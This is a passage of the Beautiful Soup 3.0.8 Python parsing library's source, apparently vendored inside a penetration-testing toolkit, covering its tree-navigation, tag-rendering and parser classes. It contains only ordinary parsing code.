pwnieexpress_raspberry_pwn/src/pentest/plecost/BeautifulSoup.py
"""Beautiful Soup Elixir and Tonic "The Screen-Scraper's Friend" http://www.crummy.com/software/BeautifulSoup/ Beautiful Soup parses a (possibly invalid) XML or HTML document into a tree representation. It provides methods and Pythonic idioms that make it easy to navigate, search, and modify the tree. A well-formed XML/HTML document yields a well-formed data structure. An ill-formed XML/HTML document yields a correspondingly ill-formed data structure. If your document is only locally well-formed, you can use this library to find and process the well-formed part of it. Beautiful Soup works with Python 2.2 and up. It has no external dependencies, but you'll have more success at converting data to UTF-8 if you also install these three packages: * chardet, for auto-detecting character encodings http://chardet.feedparser.org/ * cjkcodecs and iconv_codec, which add more encodings to the ones supported by stock Python. http://cjkpython.i18n.org/ Beautiful Soup defines classes for two main parsing strategies: * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific language that kind of looks like XML. * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid or invalid. This class has web browser-like heuristics for obtaining a sensible parse tree in the face of common HTML errors. Beautiful Soup also defines a class (UnicodeDammit) for autodetecting the encoding of an HTML or XML document, and converting it to Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. For more than you ever wanted to know about Beautiful Soup, see the documentation: http://www.crummy.com/software/BeautifulSoup/documentation.html Here, have some legalese: Copyright (c) 2004-2009, Leonard Richardson All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the the Beautiful Soup Consortium and All Night Kosher Bakery nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. """ from __future__ import generators __author__ = "Leonard Richardson (leonardr@segfault.org)" __version__ = "3.0.8" __copyright__ = "Copyright (c) 2004-2009 Leonard Richardson" __license__ = "New-style BSD" from sgmllib import SGMLParser, SGMLParseError import codecs import markupbase import types import re import sgmllib try: from htmlentitydefs import name2codepoint except ImportError: name2codepoint = {} try: set except NameError: from sets import Set as set #These hacks make Beautiful Soup able to parse XML with namespaces sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*') markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match DEFAULT_OUTPUT_ENCODING = "utf-8" def _match_css_class(str): """Build a RE to match the given CSS class.""" return re.compile(r"(^|.*\s)%s($|\s)" % str) # First, the classes that represent markup elements. class PageElement(object): """Contains the navigational information for some part of the page (either a tag or a piece of text)""" def setup(self, parent=None, previous=None): """Sets up the initial relations between this element and other elements.""" self.parent = parent self.previous = previous self.next = None self.previousSibling = None self.nextSibling = None if self.parent and self.parent.contents: self.previousSibling = self.parent.contents[-1] self.previousSibling.nextSibling = self def replaceWith(self, replaceWith): oldParent = self.parent myIndex = self.parent.index(self) if hasattr(replaceWith, "parent")\ and replaceWith.parent is self.parent: # We're replacing this element with one of its siblings. index = replaceWith.parent.index(replaceWith) if index and index < myIndex: # Furthermore, it comes before this element. That # means that when we extract it, the index of this # element will change. myIndex = myIndex - 1 self.extract() oldParent.insert(myIndex, replaceWith) def replaceWithChildren(self): myParent = self.parent myIndex = self.parent.index(self) self.extract() reversedChildren = list(self.contents) reversedChildren.reverse() for child in reversedChildren: myParent.insert(myIndex, child) def extract(self): """Destructively rips this element out of the tree.""" if self.parent: try: del self.parent.contents[self.parent.index(self)] except ValueError: pass #Find the two elements that would be next to each other if #this element (and any children) hadn't been parsed. Connect #the two. lastChild = self._lastRecursiveChild() nextElement = lastChild.next if self.previous: self.previous.next = nextElement if nextElement: nextElement.previous = self.previous self.previous = None lastChild.next = None self.parent = None if self.previousSibling: self.previousSibling.nextSibling = self.nextSibling if self.nextSibling: self.nextSibling.previousSibling = self.previousSibling self.previousSibling = self.nextSibling = None return self def _lastRecursiveChild(self): "Finds the last element beneath this object to be parsed." lastChild = self while hasattr(lastChild, 'contents') and lastChild.contents: lastChild = lastChild.contents[-1] return lastChild def insert(self, position, newChild): if isinstance(newChild, basestring) \ and not isinstance(newChild, NavigableString): newChild = NavigableString(newChild) position = min(position, len(self.contents)) if hasattr(newChild, 'parent') and newChild.parent is not None: # We're 'inserting' an element that's already one # of this object's children. if newChild.parent is self: index = self.index(newChild) if index > position: # Furthermore we're moving it further down the # list of this object's children. That means that # when we extract this element, our target index # will jump down one. position = position - 1 newChild.extract() newChild.parent = self previousChild = None if position == 0: newChild.previousSibling = None newChild.previous = self else: previousChild = self.contents[position-1] newChild.previousSibling = previousChild newChild.previousSibling.nextSibling = newChild newChild.previous = previousChild._lastRecursiveChild() if newChild.previous: newChild.previous.next = newChild newChildsLastElement = newChild._lastRecursiveChild() if position >= len(self.contents): newChild.nextSibling = None parent = self parentsNextSibling = None while not parentsNextSibling: parentsNextSibling = parent.nextSibling parent = parent.parent if not parent: # This is the last element in the document. break if parentsNextSibling: newChildsLastElement.next = parentsNextSibling else: newChildsLastElement.next = None else: nextChild = self.contents[position] newChild.nextSibling = nextChild if newChild.nextSibling: newChild.nextSibling.previousSibling = newChild newChildsLastElement.next = nextChild if newChildsLastElement.next: newChildsLastElement.next.previous = newChildsLastElement self.contents.insert(position, newChild) def append(self, tag): """Appends the given tag to the contents of this tag.""" self.insert(len(self.contents), tag) def findNext(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findAllNext, name, attrs, text, **kwargs) def findAllNext(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextGenerator, **kwargs) def findNextSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findNextSiblings, name, attrs, text, **kwargs) def findNextSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings of this Tag that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextSiblingGenerator, **kwargs) fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x def findPrevious(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs) def findAllPrevious(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousGenerator, **kwargs) fetchPrevious = findAllPrevious # Compatibility with pre-3.x def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findPreviousSiblings, name, attrs, text, **kwargs) def findPreviousSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings of this Tag that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousSiblingGenerator, **kwargs) fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x def findParent(self, name=None, attrs={}, **kwargs): """Returns the closest parent of this Tag that matches the given criteria.""" # NOTE: We can't use _findOne because findParents takes a different # set of arguments. r = None l = self.findParents(name, attrs, 1) if l: r = l[0] return r def findParents(self, name=None, attrs={}, limit=None, **kwargs): """Returns the parents of this Tag that match the given criteria.""" return self._findAll(name, attrs, None, limit, self.parentGenerator, **kwargs) fetchParents = findParents # Compatibility with pre-3.x #These methods do the real heavy lifting. def _findOne(self, method, name, attrs, text, **kwargs): r = None l = method(name, attrs, text, 1, **kwargs) if l: r = l[0] return r def _findAll(self, name, attrs, text, limit, generator, **kwargs): "Iterates over a generator looking for things that match." if isinstance(name, SoupStrainer): strainer = name # Special case some findAll* searches # findAll*(True) elif not limit and name is True and not attrs and not kwargs: return [element for element in generator() if isinstance(element, Tag)] # findAll*('tag-name') elif not limit and isinstance(name, basestring) and not attrs \ and not kwargs: return [element for element in generator() if isinstance(element, Tag) and element.name == name] # Build a SoupStrainer else: strainer = SoupStrainer(name, attrs, text, **kwargs) results = ResultSet(strainer) g = generator() while True: try: i = g.next() except StopIteration: break if i: found = strainer.search(i) if found: results.append(found) if limit and len(results) >= limit: break return results #These Generators can be used to navigate starting from both #NavigableStrings and Tags. def nextGenerator(self): i = self while i is not None: i = i.next yield i def nextSiblingGenerator(self): i = self while i is not None: i = i.nextSibling yield i def previousGenerator(self): i = self while i is not None: i = i.previous yield i def previousSiblingGenerator(self): i = self while i is not None: i = i.previousSibling yield i def parentGenerator(self): i = self while i is not None: i = i.parent yield i # Utility methods def substituteEncoding(self, str, encoding=None): encoding = encoding or "utf-8" return str.replace("%SOUP-ENCODING%", encoding) def toEncoding(self, s, encoding=None): """Encodes an object to a string in some encoding, or to Unicode. .""" if isinstance(s, unicode): if encoding: s = s.encode(encoding) elif isinstance(s, str): if encoding: s = s.encode(encoding) else: s = unicode(s) else: if encoding: s = self.toEncoding(str(s), encoding) else: s = unicode(s) return s class NavigableString(unicode, PageElement): def __new__(cls, value): """Create a new NavigableString. When unpickling a NavigableString, this method is called with the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be passed in to the superclass's __new__ or the superclass won't know how to handle non-ASCII characters. """ if isinstance(value, unicode): return unicode.__new__(cls, value) return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING) def __getnewargs__(self): return (NavigableString.__str__(self),) def __getattr__(self, attr): """text.string gives you text. This is for backwards compatibility for Navigable*String, but for CData* it lets you get the string without the CData wrapper.""" if attr == 'string': return self else: raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr) def __unicode__(self): return str(self).decode(DEFAULT_OUTPUT_ENCODING) def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): if encoding: return self.encode(encoding) else: return self class CData(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<![CDATA[%s]]>" % NavigableString.__str__(self, encoding) class ProcessingInstruction(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): output = self if "%SOUP-ENCODING%" in output: output = self.substituteEncoding(output, encoding) return "<?%s?>" % self.toEncoding(output, encoding) class Comment(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!--%s-->" % NavigableString.__str__(self, encoding) class Declaration(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!%s>" % NavigableString.__str__(self, encoding) class Tag(PageElement): """Represents a found HTML tag with its attributes and contents.""" def _invert(h): "Cheap function to invert a hash." i = {} for k,v in h.items(): i[v] = k return i XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", "quot" : '"', "amp" : "&", "lt" : "<", "gt" : ">" } XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) def _convertEntities(self, match): """Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.""" x = match.group(1) if self.convertHTMLEntities and x in name2codepoint: return unichr(name2codepoint[x]) elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: if self.convertXMLEntities: return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] else: return u'&%s;' % x elif len(x) > 0 and x[0] == '#': # Handle numeric entities if len(x) > 1 and x[1] == 'x': return unichr(int(x[2:], 16)) else: return unichr(int(x[1:])) elif self.escapeUnrecognizedEntities: return u'&amp;%s;' % x else: return u'&%s;' % x def __init__(self, parser, name, attrs=None, parent=None, previous=None): "Basic constructor." # We don't actually store the parser object: that lets extracted # chunks be garbage-collected self.parserClass = parser.__class__ self.isSelfClosing = parser.isSelfClosingTag(name) self.name = name if attrs is None: attrs = [] self.attrs = attrs self.contents = [] self.setup(parent, previous) self.hidden = False self.containsSubstitutions = False self.convertHTMLEntities = parser.convertHTMLEntities self.convertXMLEntities = parser.convertXMLEntities self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities # Convert any HTML, XML, or numeric entities in the attribute values. convert = lambda(k, val): (k, re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);", self._convertEntities, val)) self.attrs = map(convert, self.attrs) def getString(self): if (len(self.contents) == 1 and isinstance(self.contents[0], NavigableString)): return self.contents[0] def setString(self, string): """Replace the contents of the tag with a string""" self.clear() self.append(string) string = property(getString, setString) def getText(self, separator=u""): if not len(self.contents): return u"" stopNode = self._lastRecursiveChild().next strings = [] current = self.contents[0] while current is not stopNode: if isinstance(current, NavigableString): strings.append(current.strip()) current = current.next return separator.join(strings) text = property(getText) def get(self, key, default=None): """Returns the value of the 'key' attribute for the tag, or the value given for 'default' if it doesn't have that attribute.""" return self._getAttrMap().get(key, default) def clear(self): """Extract all children.""" for child in self.contents[:]: child.extract() def index(self, element): for i, child in enumerate(self.contents): if child is element: return i raise ValueError("Tag.index: element not in tag") def has_key(self, key): return self._getAttrMap().has_key(key) def __getitem__(self, key): """tag[key] returns the value of the 'key' attribute for the tag, and throws an exception if it's not there.""" return self._getAttrMap()[key] def __iter__(self): "Iterating over a tag iterates over its contents." return iter(self.contents) def __len__(self): "The length of a tag is the length of its list of contents." return len(self.contents) def __contains__(self, x): return x in self.contents def __nonzero__(self): "A tag is non-None even if it has no contents." return True def __setitem__(self, key, value): """Setting tag[key] sets the value of the 'key' attribute for the tag.""" self._getAttrMap() self.attrMap[key] = value found = False for i in range(0, len(self.attrs)): if self.attrs[i][0] == key: self.attrs[i] = (key, value) found = True if not found: self.attrs.append((key, value)) self._getAttrMap()[key] = value def __delitem__(self, key): "Deleting tag[key] deletes all 'key' attributes for the tag." for item in self.attrs: if item[0] == key: self.attrs.remove(item) #We don't break because bad HTML can define the same #attribute multiple times. self._getAttrMap() if self.attrMap.has_key(key): del self.attrMap[key] def __call__(self, *args, **kwargs): """Calling a tag like a function is the same as calling its findAll() method. Eg. tag('a') returns a list of all the A tags found within this tag.""" return apply(self.findAll, args, kwargs) def __getattr__(self, tag): #print "Getattr %s.%s" % (self.__class__, tag) if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3: return self.find(tag[:-3]) elif tag.find('__') != 0: return self.find(tag) raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag) def __eq__(self, other): """Returns true iff this tag has the same name, the same attributes, and the same contents (recursively) as the given tag. NOTE: right now this will return false if two tags have the same attributes in a different order. Should this be fixed?""" if other is self: return True if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other): return False for i in range(0, len(self.contents)): if self.contents[i] != other.contents[i]: return False return True def __ne__(self, other): """Returns true iff this tag is not identical to the other tag, as defined in __eq__.""" return not self == other def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): """Renders this tag as a string.""" return self.__str__(encoding) def __unicode__(self): return self.__str__(None) BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" + ")") def _sub_entity(self, x): """Used with a regular expression to substitute the appropriate XML entity for an XML special character.""" return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Returns a string or Unicode representation of this tag and its contents. To get Unicode, pass None for encoding. NOTE: since Python's HTML parser consumes whitespace, this method is not certain to reproduce the whitespace present in the original string.""" encodedName = self.toEncoding(self.name, encoding) attrs = [] if self.attrs: for key, val in self.attrs: fmt = '%s="%s"' if isinstance(val, basestring): if self.containsSubstitutions and '%SOUP-ENCODING%' in val: val = self.substituteEncoding(val, encoding) # The attribute value either: # # * Contains no embedded double quotes or single quotes. # No problem: we enclose it in double quotes. # * Contains embedded single quotes. No problem: # double quotes work here too. # * Contains embedded double quotes. No problem: # we enclose it in single quotes. # * Embeds both single _and_ double quotes. This # can't happen naturally, but it can happen if # you modify an attribute value after parsing # the document. Now we have a bit of a # problem. We solve it by enclosing the # attribute in single quotes, and escaping any # embedded single quotes to XML entities. if '"' in val: fmt = "%s='%s'" if "'" in val: # TODO: replace with apos when # appropriate. val = val.replace("'", "&squot;") # Now we're okay w/r/t quotes. But the attribute # value might also contain angle brackets, or # ampersands that aren't part of entities. We need # to escape those to XML entities too. val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val) attrs.append(fmt % (self.toEncoding(key, encoding), self.toEncoding(val, encoding))) close = '' closeTag = '' if self.isSelfClosing: close = ' /' else: closeTag = '</%s>' % encodedName indentTag, indentContents = 0, 0 if prettyPrint: indentTag = indentLevel space = (' ' * (indentTag-1)) indentContents = indentTag + 1 contents = self.renderContents(encoding, prettyPrint, indentContents) if self.hidden: s = contents else: s = [] attributeString = '' if attrs: attributeString = ' ' + ' '.join(attrs) if prettyPrint: s.append(space) s.append('<%s%s%s>' % (encodedName, attributeString, close)) if prettyPrint: s.append("\n") s.append(contents) if prettyPrint and contents and contents[-1] != "\n": s.append("\n") if prettyPrint and closeTag: s.append(space) s.append(closeTag) if prettyPrint and closeTag and self.nextSibling: s.append("\n") s = ''.join(s) return s def decompose(self): """Recursively destroys the contents of this tree.""" self.extract() if len(self.contents) == 0: return current = self.contents[0] while current is not None: next = current.next if isinstance(current, Tag): del current.contents[:] current.parent = None current.previous = None current.previousSibling = None current.next = None current.nextSibling = None current = next def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING): return self.__str__(encoding, True) def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Renders the contents of this tag as a string in the given encoding. If encoding is None, returns a Unicode string..""" s=[] for c in self: text = None if isinstance(c, NavigableString): text = c.__str__(encoding) elif isinstance(c, Tag): s.append(c.__str__(encoding, prettyPrint, indentLevel)) if text and prettyPrint: text = text.strip() if text: if prettyPrint: s.append(" " * (indentLevel-1)) s.append(text) if prettyPrint: s.append("\n") return ''.join(s) #Soup methods def find(self, name=None, attrs={}, recursive=True, text=None, **kwargs): """Return only the first child of this Tag matching the given criteria.""" r = None l = self.findAll(name, attrs, recursive, text, 1, **kwargs) if l: r = l[0] return r findChild = find def findAll(self, name=None, attrs={}, recursive=True, text=None, limit=None, **kwargs): """Extracts a list of Tag objects that match the given criteria. You can specify the name of the Tag and any attributes you want the Tag to have. The value of a key-value pair in the 'attrs' map can be a string, a list of strings, a regular expression object, or a callable that takes a string and returns whether or not the string matches for some custom definition of 'matches'. The same is true of the tag name.""" generator = self.recursiveChildGenerator if not recursive: generator = self.childGenerator return self._findAll(name, attrs, text, limit, generator, **kwargs) findChildren = findAll # Pre-3.x compatibility methods first = find fetch = findAll def fetchText(self, text=None, recursive=True, limit=None): return self.findAll(text=text, recursive=recursive, limit=limit) def firstText(self, text=None, recursive=True): return self.find(text=text, recursive=recursive) #Private methods def _getAttrMap(self): """Initializes a map representation of this tag's attributes, if not already initialized.""" if not getattr(self, 'attrMap'): self.attrMap = {} for (key, value) in self.attrs: self.attrMap[key] = value return self.attrMap #Generator methods def childGenerator(self): # Just use the iterator from the contents return iter(self.contents) def recursiveChildGenerator(self): if not len(self.contents): raise StopIteration stopNode = self._lastRecursiveChild().next current = self.contents[0] while current is not stopNode: yield current current = current.next # Next, a couple classes to represent queries and their results. class SoupStrainer: """Encapsulates a number of ways of matching a markup element (tag or text).""" def __init__(self, name=None, attrs={}, text=None, **kwargs): self.name = name if isinstance(attrs, basestring): kwargs['class'] = _match_css_class(attrs) attrs = None if kwargs: if attrs: attrs = attrs.copy() attrs.update(kwargs) else: attrs = kwargs self.attrs = attrs self.text = text def __str__(self): if self.text: return self.text else: return "%s|%s" % (self.name, self.attrs) def searchTag(self, markupName=None, markupAttrs={}): found = None markup = None if isinstance(markupName, Tag): markup = markupName markupAttrs = markup callFunctionWithTagData = callable(self.name) \ and not isinstance(markupName, Tag) if (not self.name) \ or callFunctionWithTagData \ or (markup and self._matches(markup, self.name)) \ or (not markup and self._matches(markupName, self.name)): if callFunctionWithTagData: match = self.name(markupName, markupAttrs) else: match = True markupAttrMap = None for attr, matchAgainst in self.attrs.items(): if not markupAttrMap: if hasattr(markupAttrs, 'get'): markupAttrMap = markupAttrs else: markupAttrMap = {} for k,v in markupAttrs: markupAttrMap[k] = v attrValue = markupAttrMap.get(attr) if not self._matches(attrValue, matchAgainst): match = False break if match: if markup: found = markup else: found = markupName return found def search(self, markup): #print 'looking for %s in %s' % (self, markup) found = None # If given a list of items, scan it for a text element that # matches. if hasattr(markup, "__iter__") \ and not isinstance(markup, Tag): for element in markup: if isinstance(element, NavigableString) \ and self.search(element): found = element break # If it's a Tag, make sure its name or attributes match. # Don't bother with Tags if we're searching for text. elif isinstance(markup, Tag): if not self.text: found = self.searchTag(markup) # If it's text, make sure the text matches. elif isinstance(markup, NavigableString) or \ isinstance(markup, basestring): if self._matches(markup, self.text): found = markup else: raise Exception, "I don't know how to match against a %s" \ % markup.__class__ return found def _matches(self, markup, matchAgainst): #print "Matching %s against %s" % (markup, matchAgainst) result = False if matchAgainst is True: result = markup is not None elif callable(matchAgainst): result = matchAgainst(markup) else: #Custom match methods take the tag as an argument, but all #other ways of matching match the tag name as a string. if isinstance(markup, Tag): markup = markup.name if markup and not isinstance(markup, basestring): markup = unicode(markup) #Now we know that chunk is either a string, or None. if hasattr(matchAgainst, 'match'): # It's a regexp object. result = markup and matchAgainst.search(markup) elif hasattr(matchAgainst, '__iter__'): # list-like result = markup in matchAgainst elif hasattr(matchAgainst, 'items'): result = markup.has_key(matchAgainst) elif matchAgainst and isinstance(markup, basestring): if isinstance(markup, unicode): matchAgainst = unicode(matchAgainst) else: matchAgainst = str(matchAgainst) if not result: result = matchAgainst == markup return result class ResultSet(list): """A ResultSet is just a list that keeps track of the SoupStrainer that created it.""" def __init__(self, source): list.__init__([]) self.source = source # Now, some helper functions. def buildTagMap(default, *args): """Turns a list of maps, lists, or scalars into a single map. Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and NESTING_RESET_TAGS maps out of lists and partial maps.""" built = {} for portion in args: if hasattr(portion, 'items'): #It's a map. Merge it. for k,v in portion.items(): built[k] = v elif hasattr(portion, '__iter__'): # is a list #It's a list. Map each item to the default. for k in portion: built[k] = default else: #It's a scalar. Map it to the default. built[portion] = default return built # Now, the parser classes. class BeautifulStoneSoup(Tag, SGMLParser): """This class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the following: You can't close a tag without closing all the tags it encloses. That is, "<foo><bar></foo>" actually means "<foo><bar></bar></foo>". [Another possible explanation is "<foo><bar /></foo>", but since this class defines no SELF_CLOSING_TAGS, it will never use that explanation.] This class is useful for parsing XML or made-up markup languages, or when BeautifulSoup makes an assumption counter to what you were expecting.""" SELF_CLOSING_TAGS = {} NESTABLE_TAGS = {} RESET_NESTING_TAGS = {} QUOTE_TAGS = {} PRESERVE_WHITESPACE_TAGS = [] MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'), lambda x: x.group(1) + ' />'), (re.compile('<!\s+([^<>]*)>'), lambda x: '<!' + x.group(1) + '>') ] ROOT_TAG_NAME = u'[document]' HTML_ENTITIES = "html" XML_ENTITIES = "xml" XHTML_ENTITIES = "xhtml" # TODO: This only exists for backwards-compatibility ALL_ENTITIES = XHTML_ENTITIES # Used when determining whether a text node is all whitespace and # can be replaced with a single space. A text node that contains # fancy Unicode spaces (usually non-breaking) should be left # alone. STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, } def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None, markupMassage=True, smartQuotesTo=XML_ENTITIES, convertEntities=None, selfClosingTags=None, isHTML=False): """The Soup object is initialized as the 'root tag', and the provided markup (which can be a string or a file-like object) is fed into the underlying parser. sgmllib will process most bad HTML, and the BeautifulSoup class has some tricks for dealing with some HTML that kills sgmllib, but Beautiful Soup can nonetheless choke or lose data if your data uses self-closing tags or declarations incorrectly. By default, Beautiful Soup uses regexes to sanitize input, avoiding the vast majority of these problems. If the problems don't apply to you, pass in False for markupMassage, and you'll get better performance. The default parser massage techniques fix the two most common instances of invalid HTML that choke sgmllib: <br/> (No space between name of closing tag and tag close) <! --Comment--> (Extraneous whitespace in declaration) You can pass in a custom list of (RE object, replace method) tuples to get Beautiful Soup to scrub your input the way you want.""" self.parseOnlyThese = parseOnlyThese self.fromEncoding = fromEncoding self.smartQuotesTo = smartQuotesTo self.convertEntities = convertEntities # Set the rules for how we'll deal with the entities we # encounter if self.convertEntities: # It doesn't make sense to convert encoded characters to # entities even while you're converting entities to Unicode. # Just convert it all to Unicode. self.smartQuotesTo = None if convertEntities == self.HTML_ENTITIES: self.convertXMLEntities = False self.convertHTMLEntities = True self.escapeUnrecognizedEntities = True elif convertEntities == self.XHTML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = True self.escapeUnrecognizedEntities = False elif convertEntities == self.XML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False else: self.convertXMLEntities = False self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) SGMLParser.__init__(self) if hasattr(markup, 'read'): # It's a file-type object. markup = markup.read() self.markup = markup self.markupMassage = markupMassage try: self._feed(isHTML=isHTML) except StopParsing: pass self.markup = None # The markup can now be GCed def convert_charref(self, name): """This method fixes a bug in Python's SGMLParser.""" try: n = int(name) except ValueError: return if not 0 <= n <= 127 : # ASCII ends at 127, not 255 return return self.convert_codepoint(n) def _feed(self, inDocumentEncoding=None, isHTML=False): # Convert the document to Unicode. markup = self.markup if isinstance(markup, unicode): if not hasattr(self, 'originalEncoding'): self.originalEncoding = None else: dammit = UnicodeDammit\ (markup, [self.fromEncoding, inDocumentEncoding], smartQuotesTo=self.smartQuotesTo, isHTML=isHTML) markup = dammit.unicode self.originalEncoding = dammit.originalEncoding self.declaredHTMLEncoding = dammit.declaredHTMLEncoding if markup: if self.markupMassage: if not hasattr(self.markupMassage, "__iter__"): self.markupMassage = self.MARKUP_MASSAGE for fix, m in self.markupMassage: markup = fix.sub(m, markup) # TODO: We get rid of markupMassage so that the # soup object can be deepcopied later on. Some # Python installations can't copy regexes. If anyone # was relying on the existence of markupMassage, this # might cause problems. del(self.markupMassage) self.reset() SGMLParser.feed(self, markup) # Close out any unfinished strings and close all the open tags. self.endData() while self.currentTag.name != self.ROOT_TAG_NAME: self.popTag() def __getattr__(self, methodName): """This method routes method call requests to either the SGMLParser superclass or the Tag superclass, depending on the method name.""" #print "__getattr__ called on %s.%s" % (self.__class__, methodName) if methodName.startswith('start_') or methodName.startswith('end_') \ or methodName.startswith('do_'): return SGMLParser.__getattr__(self, methodName) elif not methodName.startswith('__'): return Tag.__getattr__(self, methodName) else: raise AttributeError def isSelfClosingTag(self, name): """Returns true iff the given string is the name of a self-closing tag according to this parser.""" return self.SELF_CLOSING_TAGS.has_key(name) \ or self.instanceSelfClosingTags.has_key(name) def reset(self): Tag.__init__(self, self, self.ROOT_TAG_NAME) self.hidden = 1 SGMLParser.reset(self) self.currentData = [] self.currentTag = None self.tagStack = [] self.quoteStack = [] self.pushTag(self) def popTag(self): tag = self.tagStack.pop() #print "Pop", tag.name if self.tagStack: self.currentTag = self.tagStack[-1] return self.currentTag def pushTag(self, tag): #print "Push", tag.name if self.currentTag: self.currentTag.contents.append(tag) self.tagStack.append(tag) self.currentTag = self.tagStack[-1] def endData(self, containerClass=NavigableString): if self.currentData: currentData = u''.join(self.currentData) if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and not set([tag.name for tag in self.tagStack]).intersection( self.PRESERVE_WHITESPACE_TAGS)): if '\n' in currentData: currentData = '\n' else: currentData = ' ' self.currentData = [] if self.parseOnlyThese and len(self.tagStack) <= 1 and \ (not self.parseOnlyThese.text or \ not self.parseOnlyThese.search(currentData)): return o = containerClass(currentData) o.setup(self.currentTag, self.previous) if self.previous: self.previous.next = o self.previous = o self.currentTag.contents.append(o) def _popToTag(self, name, inclusivePop=True): """Pops the tag stack up to and including the most recent instance of the given tag. If inclusivePop is false, pops the tag stack up to but *not* including the most recent instqance of the given tag.""" #print "Popping to %s" % name if name == self.ROOT_TAG_NAME: return numPops = 0 mostRecentTag = None for i in range(len(self.tagStack)-1, 0, -1): if name == self.tagStack[i].name: numPops = len(self.tagStack)-i break if not inclusivePop: numPops = numPops - 1 for i in range(0, numPops): mostRecentTag = self.popTag() return mostRecentTag def _smartPop(self, name): """We need to pop up to the previous tag of this type, unless one of this tag's nesting reset triggers comes between this tag and the previous tag of this type, OR unless this tag is a generic nesting trigger and another generic nesting trigger comes between this tag and the previous tag of this type. 